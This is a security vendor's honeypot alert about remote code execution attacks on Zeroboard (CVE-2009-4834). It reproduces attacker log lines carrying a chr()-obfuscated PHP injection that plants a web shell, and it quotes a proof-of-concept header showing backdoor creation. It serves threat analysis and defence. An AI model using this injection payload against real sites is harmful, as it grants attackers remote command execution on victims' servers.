LevelBlue

LevelBlue + SentinelOne: Global Partnership to Deliver AI-Powered Managed Security Operations and Incident Response. Learn More

Submit RFP Request a Demo

[Honeypot Alert] Zeroboard now_connect() Remote Code Execution Attacks

Change theme to light
3 Minute Read by Ryan Barnett

Our web honeypots recently identified attacks for CVE-2009-4834 which is a vulnerability within Zeroboard:

123.140.193.150 - - [09/Apr/2012:20:11:19 +0900] "GET http://host_removed/admin/access_log/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 304
123.140.193.150 - - [09/Apr/2012:20:11:23 +0900] "GET http://host_removed/zboard.php?id=test/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 290
123.140.193.150 - - [09/Apr/2012:20:11:27 +0900] "GET http://host_removed/admin/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 293
123.140.193.150 - - [09/Apr/2012:20:28:41 +0900] "GET http://host_removed/admin/access_log/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 304
123.140.193.150 - - [09/Apr/2012:20:28:45 +0900] "GET http://host_removed/zboard.php?id=test/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 290
123.140.193.150 - - [09/Apr/2012:20:28:49 +0900] "GET http://host_removed/admin/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 293

The chr( injected code, attempts to execute the following commands:

./shell.php w+

Based on these payloads, the attacker appears to have used a tool similar to this proof of concept script from Exploit-DB:

/*
poc by kyoungchip,jang
email : SpeeDr00t1004@gmail.com
 
[*] the bug
- http://www.xpressengine.com/15955761
 
Application
- Zeroboard 4.1 pl7
 
Reference:
- http://www.nzeo.com
- Zeroboard preg_replace() vulnerability Remote nobody exploit by n0gada
 
 
[*] Target - My test server
 
$ ./zbexpl http://xxx.xxx.xxx/zboard/zboard.php?id=test
- Target : http://xxx.xxx.xxx/zboard/zboard.php?id=test
- Target : http://xxx.xxx.xxx/zboard/bbs/shell.php?cmd=ls
 
 
 
[+] xxx.xxx.xxx connecting ok!
[+] Exploiting zeroboard start - [+] Exploiting success!!
[*] Create Backdoor Start - [+] Create Backdoor success!!
[*] Confirmming your backdoor php script - http://192.168.179.6/zeroboard/zb41pl7/bbs/data/shell.php is generated!
[+] Exploiting success!!
- http://192.168.179.6/zeroboard/bbs/data/shell.php?cmd=ls [+] Execute the websehll script
 
*/

ABOUT LEVELBLUE

LevelBlue is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.

Latest Intelligence

Crypto Drainers as a Converging Threat: Insights into Emerging Hybrid Attack Ecosystems
A Closer Look at the Novel and Stealthy KarstoRAT Malware
Go With the Flow: Abusing OAuth Device Code Flow

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Request a Demo

Stay Informed

Sign up to receive the latest security news and trends straight to your inbox from LevelBlue.
© Copyright 2026